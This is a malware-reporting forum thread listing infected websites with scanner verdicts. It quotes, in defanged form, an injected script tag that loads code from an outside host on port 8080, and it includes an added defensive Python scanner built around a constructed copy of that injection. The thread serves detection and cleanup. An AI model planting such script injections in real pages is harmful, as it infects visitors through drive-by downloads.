Source of infection...
polonus:
Hi Pondus,
Now a Norwegian site that has this infection:
webactive24*at
Domain Hash b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address 213.188.130.108
IP Hostname linuxnl-www.active24.nl
IP Country NO (Norway)
AS Number 12994
AS Name Active ISP AS
Detections 7 / 19 (37 %)
Status DANGEROUS
Virus
Threat Name: Trojan.Malscript!html
Location: htxp://www.webactive24.at/
Drive-By Downloads
Threat Name: Trojan.Malscript!html
File name: c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location: htxp://webactive24.at/
See the attached image of the malcode...
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru
polonus
Pondus:
VirusTotal - webactive24.at.htm - 28/41 ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902
polonus:
Hi, another site with a malscript infection found, this time a Czech site:
Threat Name: Trojan.Malscript!html
Location: hxtp://www.krach-cz.cz/index.htm
Analysis: htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but it is infected with Troj/JSRedir-AK:
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location: hxtp://www.krach-cz.cz/
Our avast AV detects JS-Illredir-H here.
polonus
polonus:
Howdy malware fighters,
Here is a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10
sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name: Bloodhound.Exploit.292
Location: htxp://sorydory.russellhowe.com:8080/Applet1.html
aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
Threat Name: Bloodhound.Exploit.292
Location: htxp://aospfpgy.dogplaystation.com:8080/Applet1.html
kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name: Trojan.Malscript!html
Location: hxtp://kollinsoy.skyefenton.com:8080/HDMI.js
temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name: Trojan.Malscript!html
Location: htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf
The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:
--- Code: --- ^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ code broken by me, pol
--- End code ---
polonus
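The injection pattern quoted in the post above (a `<script src>` tag pointing at a random-looking subdomain on port 8080, immediately followed by an HTML comment holding a 32-hex-digit hash) is easy to hunt for in a local copy of a site's own files, which is what a webmaster with FTP access would do after one of these reports. The scanner below is an added example, not code from this thread or from any product mentioned in it; the hostnames, the hash marker and the sample page are constructed, and the site's own domain `www.example.com` is an assumption.

```python
import os
import re
from urllib.parse import urlparse

# Constructed sample page of a compromised site. The injected tag copies the
# shape quoted in the post (external host, port 8080, hash comment after it);
# the host, path and hash here are made up, not the ones from the thread.
SAMPLE_HTML = """<html><head><title>Legit site</title>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://www.example.com/js/menu.js"></script>
<script src="https://cdn.example.org/lib/jquery.min.js"></script>
</head><body>
<p>Welcome</p>
<script type="text/javascript" src="http://xkqwpoz.example-blog.net:8080/YouTube.js"></script>
<!--0123456789abcdef0123456789abcdef-->
</body></html>
"""

# One external <script src=...></script>, optionally followed by the
# <!--<32 hex digits>--> marker the injector leaves behind.
SCRIPT_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\'][^>]*>\s*</script>'
    r'(?:\s*<!--([0-9a-f]{32})-->)?',
    re.IGNORECASE,
)


def find_injected_scripts(html, site_host):
    """Return a list of suspicious script tags found in one HTML document.

    site_host is the site's own hostname; scripts served from it (or a
    subdomain of it) and relative paths are treated as the site's own.
    An external script is reported when it also carries at least one of
    the two indicators from the post: port 8080 or the trailing hash comment.
    """
    findings = []
    site_host = site_host.lower()
    for m in SCRIPT_RE.finditer(html):
        src, marker = m.group(1), m.group(2)
        u = urlparse(src)
        if not u.hostname:  # relative path: the site's own script
            continue
        host = u.hostname.lower()
        if host == site_host or host.endswith("." + site_host):
            continue
        reasons = []
        if u.port == 8080:
            reasons.append("port 8080")
        if marker:
            reasons.append("hash-comment marker")
        if reasons:
            findings.append({"src": src, "host": host, "marker": marker,
                             "reasons": reasons})
    return findings


def scan_tree(root, site_host, exts=(".htm", ".html", ".php")):
    """Walk a local copy of the webroot and map each infected file to its hits."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injected_scripts(fh.read(), site_host)
            if hits:
                report[path] = hits
    return report


if __name__ == "__main__":
    for hit in find_injected_scripts(SAMPLE_HTML, "www.example.com"):
        print(hit["src"], "->", ", ".join(hit["reasons"]))
```

Run `scan_tree("/path/to/local/webroot", "www.yoursite.tld")` against a fresh download of the site rather than against the live server, so the cleanup can be compared file by file. Removing the tags is only half the fix: the post says these injections are done with stolen FTP credentials, so the FTP password (and the machine it was stolen from) must be dealt with as well, or the scripts come straight back.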
polonus:
Hi malware fighters,
Another one: Threats found: 1
Here is a complete list:
Threat Name: Trojan.Malscript!html
Location: htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits
This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sites including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
polonus